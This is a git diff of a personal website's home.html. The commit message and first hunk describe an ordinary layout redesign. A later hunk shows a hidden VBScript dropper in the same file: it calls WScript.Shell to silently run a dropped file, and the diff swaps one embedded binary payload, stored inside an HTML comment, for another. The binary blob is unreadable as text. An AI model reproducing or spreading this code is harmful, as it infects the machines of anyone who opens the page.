changing directory system and created home.html design structure

--- a/home.html
+++ b/home.html
@@ -1,14 +1,19 @@
 <html>
     <head>
-        <link rel="stylesheet" href="style.css">
+        <link rel="stylesheet" href="styles/homeStyle.css">
     </head>
     <body>
         <div id="container">
-            <div id="upperCon">
-                <iframe id="topContent">
-                </iframe>
+            <div id="imageArea">
+                <img id="myPic">
             </div>
-            <div id="lowerCon">
+            <div id="textArea">
+                <div id="name">
+                </div>
+                <div id="line">
+                </div>
+                <div id="detail">
+                </div>
             </div>
         </div>
     </body>
@@ -26,10 +31,13 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--Ùgà†RR’´‡¡Òåè­¬Z§ž:•º°8‚üìS|qž™–ï¹?©Qú!UK$…œ½ÅÆèÆVM‡êoÞ0‰ÇXSÚGÙ]iÏÒk7(û¨ô>žL2mò3‘áÑT€Gì¢ß;§6M¨Ø¨ÃYä;'%þžŸ½ï|U€ñv1(òœÖTÛ2’5E'nœ7ÖFÛýñª_Þ6%¦OkÑpu÷É,ûlÝ·©bÃ±±vZ¤7Ü77£rø6í“ïÇ©(sk×³¯”ÉíAÐJ5nˆÕÂþDK)‹©GçY¸X1:8]„¤6wgnØÍÔAä¼Ý±±^~_­eöªeRÙAûCyZ‚©Fª=ÕüÜ) °/eyy~Ò%«~Þgc­ aÁ¯‚Ù»œèç«v,Ô·8ºÄA •ñ|§®ÃÔn/ËIr{!Ê.Ÿ†\Çy&TÒëð†Ö5Oe'Juwiw\!˜¸IWjj16X«—`‡ãè‘µQ'9QƒÆ#Û=jÜð;„OÀ©±¶{ä¼‡š·FÜÂï0× Ö
-RùÖ
-Ö
-Ö
-›×OØ.ÛZP×
- Ö
+//--></SCRIPT><!--DúIš1˜mN†c´¯ðt~€1
+OA‡ìWÃ›_‹’K’œy5Ý¯xÖÚ?¿újø¯PvùØ(bo˜ðÏp$<¶·ëTë²%>ÓR-C!H*É@\ÛM•6ÙÓ7äüÕU;o˜¨ÄÃéÜ¤)xo0u`êuŽBzÞÍŸà±Ç#$†aw¹uÒ ¿3YZ ¶íí‹ÕaÛÒv†M×‰ÔŸš:‚(z'm»[[o‡ÒÖ»:¨S
+lÔÎwÚX¦VˆÞ^ÝbžWátvQˆþuµl?±Ñ/›øn£j‘±æº¶tñ¤<¥c¨ÀuÔd@¾÷ xÂ*ÐôšOóòS»0©¬©9¸s£=<ÑtrèS*ª”RéS}®Ö=Z–ÏOä+êT®ËRt à³â]ð÷Hvff’{¹f‰÷ŠèQ°!!¤’+¤R“hØ3ßŠÆ-zâ/lSñ"±,dFîa
+l´ecqÐÇèrá Ü
+RùÜ
+Ü
+Ü
+‘×OóÎØZæÝ
+ Ü
 -->
